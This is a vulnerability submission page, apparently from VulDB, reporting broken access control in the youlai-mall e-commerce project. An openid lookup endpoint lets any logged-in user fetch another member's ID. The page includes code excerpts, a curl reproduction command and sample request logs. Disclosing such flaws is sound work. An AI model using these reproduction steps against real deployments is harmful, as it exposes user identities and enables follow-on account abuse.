提出 #708177: youlai-mall latest Improper Control of Resource Identifiers情報

タイトル	youlai-mall latest Improper Control of Resource Identifiers
説明	# youlai-mall improper access control and business logic flaw exposes openid→memberId mapping via GET /mall-ums/app-api/v1/members/openid/{openid}, enabling horizontal privilege escalation and unauthorized operations on victim accounts ## Contributors: Huang Weigang ### 1. Vulnerability Impact - youlai-mall (latest) - `https://github.com/youlaitech/youlai-mall` ### 2. Vulnerability Location - GET `/mall-ums/app-api/v1/members/openid/{openid}` ### 3. Code Analysis - File: `mall-ums/ums-boot/src/main/java/com/youlai/mall/ums/controller/app/MemberController.java` - Route and method: - `@GetMapping("/openid/{openid}")` - `public Result<MemberAuthDTO> getMemberByOpenid(@PathVariable String openid) {` - ` MemberAuthDTO memberAuthInfo = memberService.getMemberByOpenid(openid);` - ` return Result.success(memberAuthInfo);` - `}` - Service: `mall-ums/ums-boot/src/main/java/com/youlai/mall/ums/service/impl/UmsMemberServiceImpl.java` - `public MemberAuthDTO getMemberByOpenid(String openid) {` - ` UmsMember entity = this.getOne(new LambdaQueryWrapper<UmsMember>()` - ` .eq(UmsMember::getOpenid, openid)` - ` .select(UmsMember::getId, UmsMember::getOpenid, UmsMember::getStatus))` - ` ...` - ` return memberConvert.entity2OpenidAuthDTO(entity);` - `}` - Issues: - No ownership check (missing validation that the provided `openid` belongs to the current logged-in member, e.g., binding `openid` to `SecurityUtils.getMemberId()`). - No role/permission control (no `@PreAuthorize`; any authenticated App user can query arbitrary `openid`). - Overexposed authentication data (returns `MemberAuthDTO` including `id/openid/status` and `username = openid`, enabling account existence mapping). - Supports horizontal privilege escalation (attacker supplies victim's `openid` and gains victim's `memberId`, fueling subsequent IDOR/BOLA attacks). - Lacks enumeration/rate-limiting and auditing (distinct error code `USER_NOT_EXIST` can be used to validate and enumerate openids). ### Vulnerability Reproduction -- Preconditions - Attacker has a valid App login token (`Authorization: Bearer <token>`). - Victim's `openid` is known or discoverable (social binding, logs, UI exposure, external sources). - Target Endpoint: `GET /mall-ums/app-api/v1/members/openid/{openid}` -- Steps (horizontal privilege escalation: fetch another user's auth info) - Log in as User A and obtain a valid token. - Call the endpoint with User B's `openid`: - `curl -X GET -H "Authorization: Bearer <token>" "https://<gateway>/mall-ums/app-api/v1/members/openid/ovO2TxVictimOpenId123"` - Observe a 200 OK response, for example: - `{"code":"00000","data":{"id":12345,"username":"ovO2TxVictimOpenId123","status":1},"msg":"一切ok"}` - Outcome: Without any ownership validation, the attacker can learn the `memberId ↔ openid` mapping for the victim, enabling targeted abuse against other vulnerable App endpoints (balances, orders, addresses) that rely on predictable IDs. -- Example request/response log (reference) - "data": { - "request_data": { - "method": "GET", - "url": "`http://10.15.196.160:9999/mall-ums/app-api/v1/members/openid/ovO2TxVictimOpenId123`", - "params": {}, - "json": {}, - "data": {}, - "files": {} }, - "response_data": { - "code": "00000", - "data": {"id": 12345, "username": "ovO2TxVictimOpenId123", "status": 1}, - "msg": "一切ok" } }, - "test": { - "request_data": { - "method": "GET", - "url": "`http://10.15.196.160:9999/mall-ums/app-api/v1/members/openid/ovO2TxVictimOpenId123`", - "params": {}, - "json": {}, - "data": {}, - "files": {} }, - "response_data": { - "code": "00000", - "data": {"id": 12345, "username": "ovO2TxVictimOpenId123", "status": 1}, - "msg": "一切ok" } } ### 4. Impact Description - Unauthorized authentication data disclosure - Any logged-in user can retrieve another user's `MemberAuthDTO` via `openid`, exposing `memberId` mapping and privacy-sensitive identifiers. - Horizontal privilege escalation enabler - The `memberId ↔ openid` mapping powers subsequent IDOR/BOLA attacks on balance, order, and address endpoints, dramatically lowering attack complexity. - Account existence enumeration - Distinct success/error responses allow attackers to validate openids at scale, facilitating profiling and targeted exploitation. - Compliance and risk control issues - Exposes social unique identifier to internal account mapping without necessity; lacks rate limits, audit trails, and anomaly detection. - Expanded attack surface and chain amplification - When chained with other horizontally vulnerable endpoints (e.g., balance deduct, order delete/pay), attackers can systematically manipulate victim accounts. - System trust erosion - Authentication-related interfaces should be restricted or internal-only; current design blurs identity-resource boundaries and undermines security posture.
ソース	⚠️ https://github.com/Hwwg/cve/issues/28
ユーザー	huangweigang (UID 88993)
送信	2025年12月07日 07:05 (6 月 ago)
モデレーション	2025年12月25日 10:50 (18 days later)
ステータス	重複
VulDBエントリ	334477 [youlaitech youlai-mall 1.0.0/2.0.0 openid 特権昇格]
ポイント	0

◂ 前概要次 ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!